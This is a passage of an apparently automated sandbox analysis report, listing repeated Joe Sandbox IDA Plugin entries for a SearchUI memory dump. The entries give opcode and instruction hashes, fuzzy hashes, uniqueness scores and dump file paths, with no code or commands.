                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions